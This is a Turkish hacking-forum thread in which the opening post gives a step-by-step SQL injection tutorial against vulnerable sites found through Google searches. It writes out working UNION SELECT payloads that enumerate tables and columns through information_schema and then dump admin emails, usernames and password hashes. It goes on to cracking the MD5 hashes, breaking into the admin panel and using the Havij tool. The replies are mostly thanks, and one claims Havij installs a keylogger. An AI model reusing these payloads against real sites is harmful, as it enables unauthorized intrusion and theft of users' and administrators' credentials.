THT DUYURU

Web & Server Güvenliği Doğru web ve veritabanı sunucusu güvenliği sağlanmadan, bilgisayar korsanları hassas verilerinize erişebilir. Web, Sunucu ve veritabanı güvenliğini nasıl sağlayacağınızı buradan öğrenebilirsiniz.

chat
Seçenekler

Sql anlayamayanlar için geniş anlatım

StarTÜRK - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
10/2009
Nereden:
\windows\sys
Mesajlar:
3.776
Konular:
2147
Teşekkür (Etti):
108
Teşekkür (Aldı):
624
Ticaret:
(0) %
03-07-2011 20:33
#1
Sql anlayamayanlar için geniş anlatım

Merhaba Bu Konuyu Yeni Başlayanlar İçin açmak istiyorum
çoğu yerlerde ayrıntılı olarak anlatılmıyor ve arkadaşların aklında takılı yerler kalıyor kalmaması için bu konuyu açıyorum.


Googlede arama yaptınız ve mysql injection yiyen bi site buldunuz hemen başlayalım
ozaman.


hatayı bulduktan sonra ha birde bağzı siteler ’a ile hata vermiyor peki bunun için ne yapıcağız derseniz
+and+1=0 ekleyerek hatamızı alabiliriz. daha bir çok hata kodları var arama yapabilirsiniz

Şimdi Anlatıma Geçmek İstiyorum

1. Adım Hata Almak

örneksite.com/index.php?id=1’a yaptık ve hatamız ekrana geldi

sonra

2. adım olarak column bulma

bu defada örneksite.com/index.php?id=1+order+by+30-- yazarak kolun numaralarını almaya çalışıyoruz Evet 30 yazdık ve unknow ’30’ diye hata veriyorsa column sayımız 30 dan küçüktür demek

ozamn 30 sayısını tek tek geri doğru düşürüyoruz.Hata vermeyen bir ekran gelene kadar

ve sonunda 15 e geldik ve hata vermedi
örnek

örneksite.com/index.php?id=1+order+by+15-- dedik ve hata vermedi ise column sayımız 15 demektir.

sıra geldik bilgileri çekecek column numaralarını bulmaya
bunun içinde

örneksite.com/index.php?id=1+union+select+1,2,3,4,5,6,7,8,9,10,1 1,12,13,14,15--
dedik ve ekrana column numaraları yansını

örnek
3 5 diye bu demektir ki. Bilgileri 3 ve 5 numaralı columnlardan çekeceğiz

bunun içinde

örneksite.com/index.php?id=1+union+select+1,2,version(),4,5,6,7, 8,9,10,11,12,13,14,15--

yazdık ve 3. column a version() koyarız Ve versionuda bulduk version 5.x miş
ama 4.x çıkarsa bilgiler çekilmez

sırada tablo isimlerini bulmak var.Budefa da version() yazdığımız yere group_concat(table_name) yazalım ve sitenin sonunada +from+information_schema.tables-- ekleriz

örnek

örneksite.com/index.php?id=1+union+select+1,2,group_concat(table _name),4,5,6,7,8,9,10,11,12,13,14,15+from+informat ion_schema.tables--



Yaptığımızda Tablo isimleri yansıdı ama bize gerekli olan yerler admin , yönetici,siteayar,user,users, members, gibi üye yada admin yerleri ama baı sitelerde gerçek tablo isimleri yansımaz bunun için ise

+from+information_schema.tables+where+table_schema =database()-- ekleriz

örnek

örneksite.com/index.php?id=1+union+select+1,2,group_concat(table _name),4,5,6,7,8,9,10,11,12,13,14,15
+from+information_schema.tables+where+table_schema =database()-- yazarız ve tüm tablo isimlerimizi görterir
örnek

admin,arab07applogin,
arab07flash,arab07gallery,
arab07headline_news,arab07lastnews,
arab07login,arab07news,arab07newsletter,arab07numb er,
arab07participate,arabdemoengallery,arabdemoenhead line_news,
arabdemoenlastnews,arabdemoenlastnews_first,arabde moenlogin,
arabdemoennews,arabdemoennewsletter,arabdemogaller y,
arabdemoheadline_news,arabde gibi


şimdi ide işe koyulalım bize burdan admin işe yarar

örneksite.com/index.php?id=1+union+select+1,2,group_concat(colum n_name),4,5,6,7,8,9,10,11,12,13,14,15+from+informa tion_schema.columns+where+table_name=0x61646d696e

yaparak admin column unun içindeki bilgileri çekeriz ama 0x61646d696e bu sayılar ne diye soracak olursanız admin-- yazısının hex lenmiş halidir

bağzı sistemlerde group_concata izin vermez onun içinde
limit kullanırız bunu hem table hemde coloum kullanımı için yapa biliriz table bulalım

örneksite.com/index.php?id=1+union+select+1,2,table _name,4,5,6,7,8,9,10,11,12,13,14,15+from+informati on_schema.tables+where+limit 1=1

yaptığımızda columnlar yansır ve 1=1 2=1 3=1 4=1 tıye tek tek arttırdığımızda değişik columnlar çıkar

şimdi tablemiz admin column larımızda email,kullaniciadi,sifre
olsun bunları siteye nasıl uygulayacaz bakalım

örneksite.com/index.php?id=1+union+select+group_concat(email,0x3 a,kullaniciadi,0x3a,sifre),2,3,4,5,6,7,8,9,10,11,1 2+fr om+admin--

Yaptığımızda Admin Yetkisine sahim kullanıcı bilgileri çıkacaktır

0x3a bunlar ne diye soracak olursanız : iki nokta üst üst ednin hex lenmiş halidir

ve ekrana yansıdı sırasıyla önce email yazdık ve en başta email çıkar sonra kullanıcı adı ve en sonada şifre olarak yansır tabi siz bunlrın yerlerini değiştire bilirsiniz

eğer şifremiz md5 olarak çıkmış ise md5 i kırarsınız ve admin panelini bulup içeri dala bilirsiniz

ama hiç bunlarla uğraşmayıp havij proğramınıda indire bilirsiniz kullanımı çok basittir

admin paneli bulma ve md 5 kırma proğramıdır aynı zamandada


bende burdan başladım temelini örenmeye
marsel221, Er0in, heros3162 Teşekkür etti.
İnvalidName - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
07/2010
Mesajlar:
103
Konular:
15
Teşekkür (Etti):
3
Teşekkür (Aldı):
6
Ticaret:
(0) %
06-07-2011 23:30
#2
Tskkrler paylasım ıcın msn versm (ozelden mj at snınkını) de yardım edebilirmisinSQL Injection Hakkında??
---------------------
"The world is changing."
"Who now has the strength to stand against the armies of Isengard and Mordor."
"To stand against the might of Sauron and Saruman, and the union of the Two Towers."
"Together, My Lord Sauron, we shall rule this Middle-Earth."
StarTÜRK - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
10/2009
Nereden:
\windows\sys
Mesajlar:
3.776
Konular:
2147
Teşekkür (Etti):
108
Teşekkür (Aldı):
624
Ticaret:
(0) %
06-07-2011 23:32
#3
Alıntı:
İnvalidName´isimli üyeden Alıntı Mesajı göster
Tskkrler paylasım ıcın msn versm (ozelden mj at snınkını) de yardım edebilirmisinSQL Injection Hakkında??

suanda bnde örenme aşamasındayım konunun altın yazdım tam pro . degillim faydalı olur diye konuyu actım
İnvalidName - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
07/2010
Mesajlar:
103
Konular:
15
Teşekkür (Etti):
3
Teşekkür (Aldı):
6
Ticaret:
(0) %
06-07-2011 23:40
#4
tm kardesım sagol o zmn nse ynede arkadas olarak ekle sn forumda bnı
İyi Forumlar..!
---------------------
"The world is changing."
"Who now has the strength to stand against the armies of Isengard and Mordor."
"To stand against the might of Sauron and Saruman, and the union of the Two Towers."
"Together, My Lord Sauron, we shall rule this Middle-Earth."
@YAHYA@ - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
07/2008
Mesajlar:
58
Konular:
6
Teşekkür (Etti):
33
Teşekkür (Aldı):
6
Ticaret:
(0) %
07-07-2011 16:02
#5
bole uraşcanıza havij programıyla hackleyin kolay oluo ama havij system32/windir/ klasörünün içine keylogger atıo
hack hunter - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
02/2011
Nereden:
cyber city
Mesajlar:
501
Konular:
30
Teşekkür (Etti):
3
Teşekkür (Aldı):
24
Ticaret:
(0) %
07-07-2011 18:33
#6
konu web bölümen açlıması gerek !!!!!!!!!
--------------------- karışma bende
marsel221 - ait Kullanıcı Resmi (Avatar)
Forumdan Uzaklaştırıldı
Üyelik tarihi:
08/2010
Nereden:
Hatay
Mesajlar:
336
Konular:
27
Teşekkür (Etti):
53
Teşekkür (Aldı):
43
Ticaret:
(0) %
10-07-2011 17:09
#7
sql en yaygın kullanılan açıklardan biridir
qelq - ait Kullanıcı Resmi (Avatar)
Forumdan Uzaklaştırıldı
Üyelik tarihi:
04/2010
Nereden:
Mars
Mesajlar:
338
Konular:
74
Teşekkür (Etti):
27
Teşekkür (Aldı):
125
Ticaret:
(0) %
10-07-2011 19:03
#8
eline sağlık
marsel221 - ait Kullanıcı Resmi (Avatar)
Forumdan Uzaklaştırıldı
Üyelik tarihi:
08/2010
Nereden:
Hatay
Mesajlar:
336
Konular:
27
Teşekkür (Etti):
53
Teşekkür (Aldı):
43
Ticaret:
(0) %
10-07-2011 20:11
#9
çok kişinin işine yarıyacak
DarkDance - ait Kullanıcı Resmi (Avatar)
Forumdan Uzaklaştırıldı
Üyelik tarihi:
08/2006
Mesajlar:
36
Konular:
1
Teşekkür (Etti):
0
Teşekkür (Aldı):
1
Ticaret:
(0) %
13-07-2011 16:23
#10
paylaşım için çok teşekkürler

Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler